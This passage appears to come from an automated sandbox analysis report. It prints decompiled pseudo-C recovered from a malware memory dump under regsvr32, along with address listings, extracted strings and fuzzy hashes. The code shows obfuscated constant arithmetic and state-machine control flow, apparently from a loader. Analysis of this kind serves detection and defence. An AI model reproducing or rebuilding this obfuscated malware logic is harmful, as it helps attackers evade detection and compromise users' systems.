				_t453[0x1a] = _t453[0x1a] + 0xffff63f4;
				_t453[0x1a] = _t453[0x1a] ^ 0x00c360dd;
				_t453[0xa] = 0x315c71;
				_t453[0xa] = _t453[0xa] * 0x2d;
				_t453[0xa] = _t453[0xa] << 4;
				_t453[0xa] = _t453[0xa] >> 9;
				_t453[0xa] = _t453[0xa] ^ 0x004c0641;
				_t453[0x26] = 0xfaa693;
				_t453[0x26] = _t453[0x26] / _t441;
				_t453[0x26] = _t453[0x26] ^ 0x0006da62;
				_t453[6] = 0x2e22d8;
				_t453[6] = _t453[6] + 0x1da5;
				_t453[6] = _t453[6] ^ 0x7a3436a8;
				_t453[6] = _t453[6] + 0x3380;
				_t453[6] = _t453[6] ^ 0x7a1ea83a;
				_t453[0xe] = 0x225cf9;
				_t442 = 0x46;
				_t453[0xf] = _t453[0xe] * 0xd;
				_t453[0xf] = _t453[0xf] / _t442;
				_t453[0xf] = _t453[0xf] ^ 0x000c9e58;
				_t453[0x1e] = 0xb4cd70;
				_t443 = 5;
				_t453[0x1e] = _t453[0x1e] / _t443;
				_t453[0x1e] = _t453[0x1e] ^ 0x00223e8b;
				_t453[0x25] = 0x175145;
				_t453[0x25] = _t453[0x25] + 0xffffbe60;
				_t453[0x25] = _t453[0x25] ^ 0x0015ea4b;
				_t453[0x16] = 0x9a90a6;
				_t453[0x16] = _t453[0x16] >> 1;
				_t453[0x16] = _t453[0x16] | 0x97e6917e;
				_t453[0x16] = _t453[0x16] ^ 0x97edbee9;
				_t453[0x14] = 0x10553c;
				_t453[0x14] = _t453[0x14] | 0x69ed7b68;
				_t453[0x14] = _t453[0x14] ^ 0x8ccf5101;
				_t453[0x14] = _t453[0x14] ^ 0xe532736d;
				_t453[0x12] = 0x5e103c;
				_t453[0x12] = _t453[0x12] ^ 0xd5bdf2ed;
				_t453[0x12] = _t453[0x12] | 0x536bb37e;
				_t453[0x12] = _t453[0x12] ^ 0xd7e39e3a;
				_t453[6] = 0xad714c;
				_t453[6] = _t453[6] << 5;
				_t444 = 0x5a;
				_t453[6] = _t453[6] * 0x77;
				_t453[6] = _t453[6] | 0x8fd7f967;
				_t453[6] = _t453[6] ^ 0x9ffa7b5b;
				_t453[0x29] = 0x969a62;
				_t453[0x29] = _t453[0x29] + 0xffff3747;
				_t453[0x29] = _t453[0x29] ^ 0x009bad24;
				_t453[0x22] = 0xa29aa2;
				_t453[0x22] = _t453[0x22] + 0xffff9bca;
				_t453[0x22] = _t453[0x22] ^ 0x00a8d7f4;
				_t453[0x28] = 0x5c718d;
				_t453[0x28] = _t453[0x28] / _t444;
				_t453[0x28] = _t453[0x28] ^ 0x000e04a7;
				_t453[0x15] = 0x6aed70;
				_t453[0x15] = _t453[0x15] | 0x24270adc;
				_t453[0x15] = _t453[0x15] ^ 0x00a30154;
				_t453[0x15] = _t453[0x15] ^ 0x24c5236d;
				_t453[0x20] = 0x9ad963;
				_t453[0x20] = _t453[0x20] ^ 0x804e7f4a;
				_t453[0x20] = _t453[0x20] ^ 0x80d9ea50;
				_t453[0x1c] = 0xc68496;
				_t453[0x1c] = _t453[0x1c] >> 0x10;
				_t453[0x1c] = _t453[0x1c] ^ 0x0003f168;
				_t453[0x24] = 0x7e4214;
				_t453[0x24] = _t453[0x24] << 4;
				_t453[0x24] = _t453[0x24] ^ 0x07e08805;
				_t453[0x11] = 0x92d404;
				_t445 = 0x3c;
				_t453[0x10] = _t453[0x11] / _t445;
				_t453[0x10] = _t453[0x10] + 0x2a76;
				_t453[0x10] = _t453[0x10] ^ 0x0004ebe7;
				_t453[9] = 0xe8ea05;
				_t453[9] = _t453[9] + 0xffffd5a4;
				_t453[9] = _t453[9] << 7;
				_t453[9] = _t453[9] + 0xffff1c2a;
				_t453[9] = _t453[9] ^ 0x7454948f;
				_t453[7] = 0x853308;
				_t453[7] = _t453[7] + 0xffff5128;
				_t453[7] = _t453[7] + 0x9f37;
				_t453[7] = _t453[7] | 0x54c51839;
				_t453[7] = _t453[7] ^ 0x54ca1cec;
				_t453[0x1c] = 0x270edd;
				_t453[0x1c] = _t453[0x1c] + 0x9c5c;
				_t453[0x1c] = _t453[0x1c] ^ 0x00251ad9;
				_t453[0x22] = 0x4b1e01;
				_t453[0x22] = _t453[0x22] >> 0xa;
				_t453[0x22] = _t453[0x22] ^ 0x00014be5;
				_t453[0xf] = 0x1097d4;
				_t453[0xf] = _t453[0xf] ^ 0x70356bb9;
				_t453[0xf] = _t453[0xf] << 7;
				_t453[0xf] = _t453[0xf] ^ 0x12f26116;
				_t453[0xd] = 0x3e61;
				_t453[0xd] = _t453[0xd] ^ 0x4940d563;
				_t453[0xd] = _t453[0xd] << 5;
				_t453[0xd] = _t453[0xd] ^ 0x28127601;
				_t453[0x19] = 0xea3040;
				_t265 =  &(_t453[0x19]); // 0xea3040
				_t446 = 0x24;
				_t390 = _t453[0x2a];
				_t453[0x1a] =  *_t265 * 0x3e;
				_t435 = _t453[0x2a];
				_t453[0x1a] = _t453[0x1a] / _t446;
				_t453[0x1a] = _t453[0x1a] ^ 0x01901c81;
				_t453[0xd] = 0xdd1c82;
				_t447 = 0x39;
				_t451 = _t453[0x29];
				_t453[0xc] = _t453[0xd] * 0x64;
				_t453[0xc] = _t453[0xc] / _t447;
				_t453[0xc] = _t453[0xc] ^ 0x01838ff7;
				L1:
				while(1) {
					while(_t392 != 0x17dddcb) {
						if(_t392 == 0x8a29766) {
							L04B52B09(_t453[0x24], _t435, _t453[0x10], _t453[0xd]);
							_t392 = 0xcdeb26f;
							continue;
						} else {
							if(_t392 == 0xac116a6) {
								E04B50DB1(_t453[0x1b],  &(_t453[0x2d]), __eflags, _t453[0xd], _t392, _t453[0x1e]);
								_t373 = E04B409DD(_t453[0x1b],  &(_t453[0x30]), _t453[0x24], _t453[0x15]);
								_t451 = _t373;
								_t453 =  &(_t453[5]);
								_t392 = 0xf1147e4;
								 *((short*)(_t373 - 2)) = 0;
								continue;
							} else {
								if(_t392 == 0xcdeb26f) {
									_t337 =  &(_t453[0x19]); // 0xea3040
									E04B51538( *_t337, _t453[0xc], _t390);
								} else {
									if(_t392 == 0xe12044f) {
										_t392 = 0xac116a6;
										continue;
									} else {
										if(_t392 == 0xe899f05) {
											_t378 = E04B4E406(_t453[0x11], _t453[0x33], _t392, _t453[0x2b], _t453[0x30], _t435, _t453[0xb], _t392,  &(_t453[0x2e]), _t453[0x2d], _t453[0x17], _t453[0x21], _t392, _t390);
											_t453 =  &(_t453[0xc]);
											__eflags = _t378;
											if(_t378 == 0) {
												L17:
												_t379 = _t453[0x2a];
											} else {
												_t449 = _t435;
												while(1) {
													__eflags =  *((intOrPtr*)(_t449 + 4)) - 4;
													if( *((intOrPtr*)(_t449 + 4)) != 4) {
														goto L14;
													}
													L13:
													_t387 = E04B5061D(_t453[0x1d], _t451, _t449 + 0xc, _t453[0x24], _t453[0x10]);
													_t453 =  &(_t453[3]);
													__eflags = _t387;
													if(_t387 == 0) {
														_t379 = 1;
														_t453[0x2a] = 1;
													} else {
														goto L14;
													}
													goto L18;
													L14:
													_t385 =  *_t449;
													__eflags = _t385;
													if(_t385 == 0) {
														goto L17;
													} else {
														_t449 = _t449 + _t385;
														__eflags =  *((intOrPtr*)(_t449 + 4)) - 4;
														if( *((intOrPtr*)(_t449 + 4)) != 4) {
															goto L14;
														}
													}
													goto L18;
												}
											}
											L18:
											__eflags = _t379;
											if(__eflags == 0) {
												L20:
												_t392 = 0xe899f05;
											} else {
												_t383 =  *0x4b56208; // 0x0
												E04B527BC(_t453[0xa], _t453[8],  *((intOrPtr*)(_t383 + 0x18)), _t453[0x1c]);
												_t392 = 0x8a29766;
											}
											continue;
											L30:
										} else {
											if(_t392 != 0xf1147e4) {
												L26:
												__eflags = _t392 - 0x2906cf2;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												_t382 = E04B545CA( &(_t453[0x38]), _t453[0x2f], _t392, _t392, _t453[0x23], _t453[0x12], _t453[0x2d], 1, _t453[0xb], _t453[0x12], 0x2000000, _t453[0x1f], _t453[0x18], _t453[8] | 0x00000006);
												_t390 = _t382;
												_t453 =  &(_t453[0xc]);
												if(_t382 != 0xffffffff) {
													_t392 = 0x17dddcb;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L29:
						__eflags = 0;
						return 0;
						goto L30;
					}
					_push(_t392);
					_push(_t392);
					_t453[0x2c] = 0x1000;
					_t435 = E04B3C5D8(0x1000);
					_t453 =  &(_t453[3]);
					__eflags = _t435;
					if(__eflags != 0) {
						goto L20;
					} else {
						_t392 = 0xcdeb26f;
						goto L26;
					}
					goto L29;
				}
			}

0x04b536b0
0x04b536bd
0x04b536c6
0x04b536d0
0x04b536d5
0x04b536db
0x04b536e0
0x04b536e8
0x04b536f0
0x04b536f8
0x04b53700
0x04b53705
0x04b5370d
0x04b53715
0x04b5371a
0x04b53722
0x04b5372a
0x04b53736
0x04b5373b
0x04b53741
0x04b53749
0x04b53751
0x04b5375e
0x04b53761
0x04b53769
0x04b5376d
0x04b53775
0x04b5377d
0x04b53785
0x04b5378d
0x04b53795
0x04b5379d
0x04b537ad
0x04b537b1
0x04b537b9
0x04b537c1
0x04b537d4
0x04b537d5
0x04b537dc
0x04b537e7
0x04b537ef
0x04b537f7
0x04b537fc
0x04b53804
0x04b5380f
0x04b5381a
0x04b53825
0x04b5382d
0x04b53835
0x04b5383d
0x04b5384a
0x04b5384e
0x04b53853
0x04b53858
0x04b53860
0x04b53874
0x04b5387b
0x04b53886
0x04b53890
0x04b53898
0x04b538a0
0x04b538a8
0x04b538b0
0x04b538bf
0x04b538c2
0x04b538ce
0x04b538d2
0x04b538da
0x04b538e6
0x04b538eb
0x04b538f1
0x04b538f9
0x04b53904
0x04b5390f
0x04b5391a
0x04b53922
0x04b53926
0x04b5392e
0x04b53936
0x04b5393e
0x04b53946
0x04b5394e
0x04b53956
0x04b5395e
0x04b53966
0x04b5396e
0x04b53976
0x04b5397e
0x04b53988
0x04b5398b
0x04b5398f
0x04b53997
0x04b5399f
0x04b539aa
0x04b539b5
0x04b539c0
0x04b539cb
0x04b539d6
0x04b539e1
0x04b539f7
0x04b539fe
0x04b53a09
0x04b53a11
0x04b53a19
0x04b53a21
0x04b53a29
0x04b53a34
0x04b53a3f
0x04b53a4a
0x04b53a52
0x04b53a57
0x04b53a5f
0x04b53a6a
0x04b53a72
0x04b53a7d
0x04b53a89
0x04b53a8c
0x04b53a90
0x04b53a98
0x04b53aa0
0x04b53aa8
0x04b53ab2
0x04b53ab7
0x04b53abf
0x04b53ac7
0x04b53acf
0x04b53ad7
0x04b53adf
0x04b53ae7
0x04b53aef
0x04b53af7
0x04b53aff
0x04b53b07
0x04b53b12
0x04b53b1a
0x04b53b25
0x04b53b2d
0x04b53b35
0x04b53b3a
0x04b53b42
0x04b53b4a
0x04b53b52
0x04b53b57
0x04b53b5f
0x04b53b67
0x04b53b6e
0x04b53b71
0x04b53b78
0x04b53b84
0x04b53b8b
0x04b53b8f
0x04b53b97
0x04b53ba4
0x04b53ba5
0x04b53bac
0x04b53bb6
0x04b53bba
0x00000000
0x04b53bc2
0x04b53bc2
0x04b53bd4
0x04b53d95
0x04b53d9c
0x00000000
0x04b53bda
0x04b53be0
0x04b53d4f
0x04b53d6a
0x04b53d6f
0x04b53d71
0x04b53d76
0x04b53d7b
0x00000000
0x04b53be6
0x04b53bec
0x04b53df4
0x04b53df9
0x04b53bf2
0x04b53bf8
0x04b53d31
0x00000000
0x04b53bfe
0x04b53c04
0x04b53cac
0x04b53cb1
0x04b53cb4
0x04b53cb6
0x04b53cf7
0x04b53cf7
0x04b53cb8
0x04b53cb8
0x04b53cba
0x04b53cba
0x04b53cbe
0x00000000
0x00000000
0x04b53cc0
0x04b53cd5
0x04b53cda
0x04b53cdd
0x04b53cdf
0x04b53ced
0x04b53cee
0x00000000
0x00000000
0x00000000
0x00000000
0x04b53ce1
0x04b53ce1
0x04b53ce3
0x04b53ce5
0x00000000
0x04b53ce7
0x04b53ce7
0x04b53cba
0x04b53cbe
0x00000000
0x00000000
0x04b53cbe
0x00000000
0x04b53ce5
0x04b53cba
0x04b53cfe
0x04b53cfe
0x04b53d00
0x04b53d27
0x04b53d27
0x04b53d02
0x04b53d06
0x04b53d16
0x04b53d1d
0x04b53d1d
0x00000000
0x00000000
0x04b53c06
0x04b53c0c
0x04b53de2
0x04b53de2
0x04b53de8
0x00000000
0x00000000
0x04b53dee
0x04b53c12
0x04b53c53
0x04b53c58
0x04b53c5a
0x04b53c60
0x04b53c66
0x00000000
0x04b53c66
0x04b53c60
0x04b53c0c
0x04b53c04
0x04b53bf8
0x04b53bec
0x04b53be0
0x04b53dff
0x04b53e02
0x04b53e0b
0x00000000
0x04b53e0b
0x04b53db9
0x04b53dba
0x04b53dc0
0x04b53dd0
0x04b53dd2
0x04b53dd5
0x04b53dd7
0x00000000
0x04b53ddd
0x04b53ddd
0x00000000
0x04b53ddd
0x00000000
0x04b53dd7

Strings

a>, xrefs: 04B53B42
q\1, xrefs: 04B5383D
{*, xrefs: 04B536E0
_sC, xrefs: 04B5370D
ms2, xrefs: 04B5394E
pj, xrefs: 04B53A09
v*, xrefs: 04B53A90
@0, xrefs: 04B53B67

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: @0$_sC$a>$ms2$pj$q\1$v*${*
API String ID: 0-3081288078
Opcode ID: 94da020959eba8321a40ff06f7e3be14408a3be9584e3bb60735b3bd102483c9
Instruction ID: 89a37b7212836a3936ab3a60b5acc7080a47ae48be9c49bd3bc53041f6491e65
Opcode Fuzzy Hash: 94da020959eba8321a40ff06f7e3be14408a3be9584e3bb60735b3bd102483c9
Instruction Fuzzy Hash: 830240715083809FD3A8CF65C48AA5BFBE1FBC4758F10890DEADA86260D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B546BD, Relevance: 10.3, Strings: 8, Instructions: 293
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04B546BD(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t316;
				intOrPtr _t339;
				intOrPtr* _t341;
				void* _t343;
				intOrPtr* _t346;
				void* _t348;
				intOrPtr* _t349;
				void* _t351;
				intOrPtr _t367;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t375;
				void* _t376;

				_t369 = _a16;
				_t349 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B4FE29(_t316);
				_v16 = 0xd9d351;
				_t367 = 0;
				_v12 = 0x17e122;
				_t376 = _t375 + 0x18;
				_v8 = 0;
				_v96 = 0xcc9d59;
				_t351 = 0xff449f4;
				_v96 = _v96 << 0xc;
				_v96 = _v96 + 0x162d;
				_v96 = _v96 ^ 0xc9d5a62c;
				_v132 = 0x3cc17f;
				_v132 = _v132 + 0xffff84d9;
				_t370 = 0x52;
				_v132 = _v132 * 0x3d;
				_v132 = _v132 << 0xf;
				_v132 = _v132 ^ 0x617c0001;
				_v48 = 0x63951b;
				_v48 = _v48 >> 7;
				_v48 = _v48 ^ 0x0000c72a;
				_v64 = 0xbc1395;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 ^ 0x000005e0;
				_v80 = 0x50b5ee;
				_v80 = _v80 + 0xf34;
				_v80 = _v80 >> 1;
				_v80 = _v80 ^ 0x00286291;
				_v92 = 0x9715d8;
				_v92 = _v92 * 0x46;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0xff220000;
				_v52 = 0xfde3f2;
				_v52 = _v52 + 0xa710;
				_v52 = _v52 ^ 0x00fe8b02;
				_v160 = 0x198337;
				_v160 = _v160 + 0xffff007e;
				_v160 = _v160 << 0x10;
				_v160 = _v160 ^ 0x69569842;
				_v160 = _v160 ^ 0xeaeb46e9;
				_v28 = 0xcc69bd;
				_v28 = _v28 ^ 0xeecfab9f;
				_v28 = _v28 ^ 0xee01123b;
				_v136 = 0x76b317;
				_v136 = _v136 / _t370;
				_v136 = _v136 + 0xffff81f3;
				_v136 = _v136 << 3;
				_v136 = _v136 ^ 0x00064d41;
				_v112 = 0x80a4bd;
				_v112 = _v112 * 0x13;
				_v112 = _v112 << 0xa;
				_v112 = _v112 + 0xcad4;
				_v112 = _v112 ^ 0x30efc400;
				_v144 = 0x82a288;
				_v144 = _v144 << 2;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 << 9;
				_v144 = _v144 ^ 0x0011be13;
				_v56 = 0x7edd30;
				_v56 = _v56 * 0x55;
				_v56 = _v56 ^ 0x2a184bb4;
				_v88 = 0xe2a415;
				_t371 = 6;
				_v88 = _v88 * 0x2a;
				_v88 = _v88 + 0xffff5f32;
				_v88 = _v88 ^ 0x252ac732;
				_v128 = 0xe004bc;
				_v128 = _v128 ^ 0x574173bd;
				_v128 = _v128 >> 9;
				_v128 = _v128 ^ 0xd8221cc5;
				_v128 = _v128 ^ 0xd803a3d4;
				_v152 = 0x516ea5;
				_v152 = _v152 + 0xffff4486;
				_v152 = _v152 | 0x140257d0;
				_v152 = _v152 >> 0xf;
				_v152 = _v152 ^ 0x00051039;
				_v120 = 0x9f4975;
				_v120 = _v120 ^ 0x86b89632;
				_v120 = _v120 * 0x24;
				_v120 = _v120 | 0x1b5f0b87;
				_v120 = _v120 ^ 0xdfd1de63;
				_v36 = 0xa5f8e9;
				_v36 = _v36 + 0x714e;
				_v36 = _v36 ^ 0x00af22d8;
				_v44 = 0x824fdb;
				_v44 = _v44 + 0xffff91e5;
				_v44 = _v44 ^ 0x008fd473;
				_v68 = 0x680ab0;
				_v68 = _v68 + 0xbc39;
				_v68 = _v68 / _t371;
				_v68 = _v68 ^ 0x001a68c1;
				_v76 = 0x17a4af;
				_v76 = _v76 >> 0xb;
				_t372 = 0x5b;
				_v76 = _v76 / _t372;
				_v76 = _v76 ^ 0x0007f211;
				_v84 = 0x315e60;
				_v84 = _v84 + 0x702b;
				_v84 = _v84 + 0xffff10cc;
				_v84 = _v84 ^ 0x003e64ec;
				_v100 = 0x9cc34d;
				_v100 = _v100 | 0x947c2ff5;
				_t373 = 0x3a;
				_v100 = _v100 / _t373;
				_v100 = _v100 ^ 0x02979c4b;
				_v140 = 0xbfeff4;
				_v140 = _v140 ^ 0x822e0370;
				_v140 = _v140 + 0xf2f6;
				_v140 = _v140 | 0x96ab8507;
				_v140 = _v140 ^ 0x96bf89b8;
				_v60 = 0xfd95c4;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x07e16726;
				_v148 = 0x38036;
				_v148 = _v148 ^ 0x54103d5f;
				_v148 = _v148 | 0x54303272;
				_t206 =  &_v148; // 0x54303272
				_v148 =  *_t206;
				_v148 = _v148 ^ 0x5432cd2c;
				_v40 = 0xc550eb;
				_v40 = _v40 | 0x63f29c9e;
				_v40 = _v40 ^ 0x63f29262;
				_v32 = 0xf7791b;
				_v32 = _v32 * 0x51;
				_v32 = _v32 ^ 0x4e4d9c2b;
				_v156 = 0xdcae59;
				_v156 = _v156 + 0xffffc6cd;
				_v156 = _v156 + 0xfffffd52;
				_v156 = _v156 ^ 0x46382038;
				_v156 = _v156 ^ 0x46e78b29;
				_v72 = 0xac5d66;
				_v72 = _v72 | 0xb655dd15;
				_v72 = _v72 + 0xffff07b1;
				_v72 = _v72 ^ 0xb6f51c6c;
				_v104 = 0x2e3a8e;
				_v104 = _v104 | 0xfac334a1;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0xaefe5277;
				_v108 = 0xcd35f0;
				_v108 = _v108 << 0xf;
				_v108 = _v108 | 0xf31160b4;
				_v108 = _v108 ^ 0xc3cc8d90;
				_v108 = _v108 ^ 0x3831362e;
				_v116 = 0x7e4b3f;
				_v116 = _v116 << 9;
				_v116 = _v116 + 0xa646;
				_v116 = _v116 + 0x5b3c;
				_v116 = _v116 ^ 0xfc982242;
				_v124 = 0x9fd9df;
				_v124 = _v124 >> 6;
				_v124 = _v124 << 0xf;
				_v124 = _v124 << 1;
				_v124 = _v124 ^ 0x7f607f7f;
				do {
					while(_t351 != 0x8274db) {
						if(_t351 == 0x30c1656) {
							_push(_t351);
							_push(_t351);
							_t339 = E04B3C5D8(_v20);
							_t376 = _t376 + 0xc;
							_v24 = _t339;
							if(_t339 != 0) {
								_t351 = 0x6ee5562;
								continue;
							}
						} else {
							if(_t351 == 0x6ee5562) {
								_t341 =  *0x4b56224; // 0x0
								_t343 = E04B511B0(_v84, _t351, _v92, _v100, _v132, _v140, _v60, _v148, _v20,  *_t369, _v40,  *((intOrPtr*)(_t369 + 4)), _v32,  &_v20, _v156, _v72, _v24,  *_t341, _v104);
								_t376 = _t376 + 0x48;
								if(_t343 == _v52) {
									 *_t349 = _v24;
									_t367 = 1;
									 *((intOrPtr*)(_t349 + 4)) = _v20;
								} else {
									_t351 = 0x8274db;
									continue;
								}
							} else {
								if(_t351 == 0xc41b31c) {
									_t346 =  *0x4b56224; // 0x0
									_t348 = E04B511B0(_v160, _t351, _v48, _v28, _v96, _v136, _v112, _v144, _v64,  *_t369, _v56,  *((intOrPtr*)(_t369 + 4)), _v88,  &_v20, _v128, _v152, _t367,  *_t346, _v120);
									_t376 = _t376 + 0x48;
									if(_t348 == _v80) {
										_t351 = 0x30c1656;
										continue;
									}
								} else {
									if(_t351 != 0xff449f4) {
										goto L14;
									} else {
										_t351 = 0xc41b31c;
										continue;
									}
								}
							}
						}
						L17:
						return _t367;
					}
					L04B52B09(_v108, _v24, _v116, _v124);
					_t351 = 0xc0b2195;
					L14:
				} while (_t351 != 0xc0b2195);
				goto L17;
			}

0x04b546c6
0x04b546cd
0x04b546d0
0x04b546d1
0x04b546d8
0x04b546df
0x04b546e6
0x04b546e7
0x04b546e8
0x04b546ed
0x04b546f8
0x04b546fa
0x04b54705
0x04b54708
0x04b54711
0x04b54719
0x04b5471e
0x04b54723
0x04b5472b
0x04b54733
0x04b5473b
0x04b5474a
0x04b5474b
0x04b5474f
0x04b54754
0x04b5475c
0x04b54767
0x04b5476f
0x04b5477a
0x04b54782
0x04b54787
0x04b5478f
0x04b54797
0x04b5479f
0x04b547a3
0x04b547ab
0x04b547b8
0x04b547bc
0x04b547c1
0x04b547c9
0x04b547d4
0x04b547df
0x04b547ea
0x04b547f2
0x04b547fa
0x04b547ff
0x04b54807
0x04b5480f
0x04b5481a
0x04b54825
0x04b54830
0x04b5483e
0x04b54842
0x04b5484a
0x04b5484f
0x04b54857
0x04b54864
0x04b54868
0x04b5486d
0x04b54875
0x04b5487d
0x04b54885
0x04b5488a
0x04b5488f
0x04b54894
0x04b5489c
0x04b548a9
0x04b548ad
0x04b548b5
0x04b548c6
0x04b548c9
0x04b548cd
0x04b548d5
0x04b548dd
0x04b548e5
0x04b548ed
0x04b548f2
0x04b548fa
0x04b54902
0x04b5490a
0x04b54912
0x04b5491a
0x04b5491f
0x04b54927
0x04b5492f
0x04b5493c
0x04b54940
0x04b54948
0x04b54950
0x04b5495b
0x04b54966
0x04b54971
0x04b5497c
0x04b54987
0x04b54992
0x04b5499a
0x04b549aa
0x04b549ae
0x04b549b6
0x04b549be
0x04b549c7
0x04b549cc
0x04b549d2
0x04b549da
0x04b549e2
0x04b549ea
0x04b549f2
0x04b549fa
0x04b54a02
0x04b54a0e
0x04b54a11
0x04b54a15
0x04b54a1d
0x04b54a25
0x04b54a2d
0x04b54a35
0x04b54a3d
0x04b54a45
0x04b54a4d
0x04b54a52
0x04b54a5a
0x04b54a62
0x04b54a6a
0x04b54a72
0x04b54a76
0x04b54a7a
0x04b54a82
0x04b54a8d
0x04b54a98
0x04b54aa3
0x04b54ab6
0x04b54abd
0x04b54ac8
0x04b54ad0
0x04b54ad8
0x04b54ae0
0x04b54aed
0x04b54af5
0x04b54afd
0x04b54b05
0x04b54b0d
0x04b54b15
0x04b54b1d
0x04b54b25
0x04b54b2a
0x04b54b32
0x04b54b3a
0x04b54b3f
0x04b54b47
0x04b54b4f
0x04b54b57
0x04b54b5f
0x04b54b64
0x04b54b6c
0x04b54b74
0x04b54b7c
0x04b54b84
0x04b54b89
0x04b54b8e
0x04b54b92
0x04b54b9a
0x04b54b9a
0x04b54ba8
0x04b54cdd
0x04b54cde
0x04b54ce6
0x04b54ceb
0x04b54cee
0x04b54cf7
0x04b54cf9
0x00000000
0x04b54cf9
0x04b54bae
0x04b54bb4
0x04b54c4e
0x04b54caf
0x04b54cb4
0x04b54cbe
0x04b54d39
0x04b54d3b
0x04b54d43
0x04b54cc0
0x04b54cc0
0x00000000
0x04b54cc0
0x04b54bba
0x04b54bc0
0x04b54bd9
0x04b54c2e
0x04b54c33
0x04b54c3a
0x04b54c40
0x00000000
0x04b54c40
0x04b54bc2
0x04b54bc8
0x00000000
0x04b54bce
0x04b54bce
0x00000000
0x04b54bce
0x04b54bc8
0x04b54bc0
0x04b54bb4
0x04b54d46
0x04b54d52
0x04b54d52
0x04b54d16
0x04b54d1d
0x04b54d22
0x04b54d22
0x00000000

Strings

F, xrefs: 04B54807
r20T, xrefs: 04B54A72
Nq, xrefs: 04B5495B
.618, xrefs: 04B54B4F
d>, xrefs: 04B549F2
8 8F, xrefs: 04B54AE0
<[, xrefs: 04B54B6C
?K~, xrefs: 04B54B57

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .618$8 8F$<[$?K~$Nq$r20T$F$d>
API String ID: 0-914106314
Opcode ID: 100b40828bb07b8709a7f9130589728b62dd22053492c62776d99b480e40cbd9
Instruction ID: 7bacdbe5b46f8778a147ba5420801d6fe855c5cae5075de17fec83a87a09cf8e
Opcode Fuzzy Hash: 100b40828bb07b8709a7f9130589728b62dd22053492c62776d99b480e40cbd9
Instruction Fuzzy Hash: 6AF1EE711093809FD769CF61C989A4BFBF1FB85748F108A1DE2DA86260D7B69948DF03

Uniqueness

Uniqueness Score: -1.00%

Function 04B4017B, Relevance: 10.3, Strings: 8, Instructions: 263
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E04B4017B(void* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _t272;
				void* _t295;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				void* _t312;
				void* _t334;
				intOrPtr _t335;
				signed int* _t338;

				_push(_a32);
				_t334 = __ecx;
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				_t272 = E04B4FE29(0);
				_v84 = _t272;
				_t338 =  &(( &_v196)[0xa]);
				_v72 = _t272;
				_t335 = _t272;
				_v80 = 0x49e87b;
				_v76 = 0xc5c8e1;
				_t312 = 0x7956bd9;
				_v96 = 0x2d2511;
				_t305 = 0x6f;
				_v96 = _v96 / _t305;
				_v96 = _v96 ^ 0x00006c1e;
				_v192 = 0x2be237;
				_t22 =  &_v192; // 0x2be237
				_t306 = 0x35;
				_v192 =  *_t22 * 0x2a;
				_v192 = _v192 ^ 0x8f196f07;
				_v192 = _v192 ^ 0x2da4b7e5;
				_v192 = _v192 ^ 0xa58ec5c4;
				_v172 = 0x207d98;
				_v172 = _v172 ^ 0x972b32db;
				_v172 = _v172 | 0x9c7c4c28;
				_v172 = _v172 * 0x48;
				_v172 = _v172 ^ 0xdbcfdb8a;
				_v100 = 0x57c7e;
				_v100 = _v100 + 0xffffdd89;
				_v100 = _v100 ^ 0x000aed2d;
				_v124 = 0x64cad1;
				_v124 = _v124 + 0xffff2d5b;
				_v124 = _v124 << 4;
